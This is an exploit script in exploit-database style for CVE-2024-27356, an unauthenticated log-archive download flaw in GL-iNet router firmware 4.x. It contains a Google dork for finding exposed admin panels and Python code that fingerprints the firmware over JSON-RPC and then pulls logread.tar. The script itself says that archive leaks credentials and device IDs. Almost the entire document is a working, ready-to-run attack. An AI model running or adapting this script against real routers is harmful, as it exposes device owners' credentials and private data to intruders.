GL-iNet MT6000 4.5.5 - Arbitrary File Download - CVE-2024-27356

1. # Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download
2. # CVE: CVE-2024-27356
3. # Google Dork: intitle:"GL.iNet Admin Panel"
4. # Date: 2/26/2024
5. # Exploit Author: Bandar Alharbi (aggressor)
6. # Vendor Homepage: www.gl-inet.com
7. # Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin
8. # Tested Model: GL-X3000 Spitz AX
9. # Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md
10.  
11. import sys
12. import requests
13. import json
14. requests.packages.urllib3.disable_warnings()
15. h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'}
16.  
17. def DoesTarExist():
18.     r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h)
19.     if r.status_code == 200:
20.         f = open("logread.tar", "wb")
21.         f.write(r.content)
22.         f.close()
23.         print("[*] Full logs archive `logread.tar` has been downloaded!")
24.         print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!")
25.         return True
26.     else:
27.         print("[*] The `logread.tar` archive does not exist however ... try again later!")
28.         return False
29.  
30. def isVulnerable():
31.     r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h)
32.     if r1.status_code == 500 and "nginx" in r1.text:
33.         r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h)
34.         if  "Admin-Token" in r2.text:
35.             j  = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]}
36.             r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h)
37.             ver = r3.json()['result']['firmware_version']
38.             model = r3.json()['result']['model']
39.             if ver.startswith(('4.')):
40.                 print("[*] Firmware version (%s) is vulnerable!" %ver)
41.                 print("[*] Device model is: %s" %model)
42.                 return True
43.     print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!")
44.     return False
45.  
46. def isAlive():
47.     try:
48.         r = requests.get(url, verify=False, timeout=30, headers=h)
49.         if r.status_code != 200:
50.             print("[*] Make sure the target's web interface is accessible!")
51.             return False
52.         elif r.status_code == 200:
53.             print("[*] The target is reachable!")
54.             return True
55.     except Exception:
56.         print("[*] Error occurred when connecting to the target!")
57.         pass
58.     return False
59.  
60. if __name__ == '__main__':
61.     if len(sys.argv) != 2:
62.         print("exploit.py url")
63.         sys.exit(0)
64.     url = sys.argv[1]
65.     url = url.lower()
66.     if not url.startswith(('http://', 'https://')):
67.         print("[*] Invalid url format! It should be http[s]://<domain or ip>")
68.         sys.exit(0)
69.     if url.endswith("/"):
70.         url = url.rstrip("/")
71.  
72.     print("[*] GL.iNet Unauthenticated Full Logs Downloader")
73.  
74.     try:
75.         if (isAlive() and isVulnerable()) == (True and True):
76.             DoesTarExist()
77.     except KeyboardInterrupt:
78.         print("[*] The exploit has been stopped by the user!")
79.         sys.exit(0)
80.